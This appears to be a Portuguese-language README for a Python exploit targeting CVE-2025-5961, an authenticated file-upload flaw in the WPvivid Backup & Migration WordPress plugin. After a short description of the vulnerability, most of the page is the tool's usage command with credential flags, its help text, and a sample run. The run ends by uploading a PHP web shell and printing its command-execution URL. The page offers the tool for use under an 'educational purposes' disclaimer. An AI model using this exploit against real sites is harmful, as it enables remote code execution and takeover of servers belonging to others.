
Migração, Backup e Staging – WPvivid Backup & Migration <= 0.9.116 - Upload arbitrário de arquivos autenticado (Administrador+)
📈 Esta vulnerabilidade afeta um plugin com mais de 700.000+ instalações
O plugin Migration, Backup, Staging – WPvivid Backup & Migration para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função wpvivid_upload_import_files em todas as versões até, e incluindo, 0.9.116.
Isso permite que atacantes autenticados (nível Administrador ou superior) façam upload de arquivos arbitrários no servidor, potencialmente permitindo a execução remota de código.
Este repositório contém um script de exploit para CVE-2025-5961, escrito em Python, que:
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL
-un, --username USERNAME
Admin username
-p, --password PASSWORD
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
Este script é fornecido apenas para fins educacionais e de pesquisa.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Khaled Alenazi (Nxploited)
🌐 GitHub